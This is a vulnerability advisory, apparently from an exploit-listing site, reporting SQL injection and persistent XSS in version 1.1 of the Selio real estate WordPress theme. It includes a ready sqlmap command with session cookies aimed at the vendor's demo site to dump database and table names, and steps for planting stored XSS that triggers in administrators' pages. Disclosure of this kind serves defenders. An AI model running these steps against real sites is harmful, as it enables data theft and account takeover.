Selio - Real Estate Directory SQL Injection & Persistent XSS

2019.09.09
ru SubversA (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

# Exploit Title: Selio - Real Estate Directory SQL Injection & Persistent XSS # Google Dork: - # Date: 08/09/2019 # Exploit Author: SubversA # Vendor Homepage: https://listing-themes.com/ # Software Link: https://themeforest.net/item/selio-real-estate-wordpress-theme/23638400 # Version: 1.1 # Tested on: Parrot OS # CVE: - # CWE: 79, 89 ----[]- SQL Injection: -[]---- Vulnerable 'id' parameter is https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=21 You need a new user account (agent:agent on the demo website), then use the sqlmap (with --cookie option): sqlmap --url="https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=21" --cookie="wordpress_logged_in_0123456789=agent%7C1a2b3c4d5e6f7g8h9i0j; wordpress_sec_0123456789=agent%7C0a1b2c3d4e5f6g7h8i9j" --dbs -D geniuscr_selio --tables ----[]- Persistent XSS: -[]---- You need a new user account, then go to any property listing on the website and use «ENQUIRY FORM» on the right sidebar. Vulnerable text area is «Message». Injection will trigger on the https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlisting_messages page many times for any basic user. Or you can press the «REPORT LISTING» button on any property page and use your payload inside the «Message» text box. Injection will trigger on the https://listing-themes.com/selio-wp/wp-admin/admin.php?page=listing_reports page when administrator will be online.


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top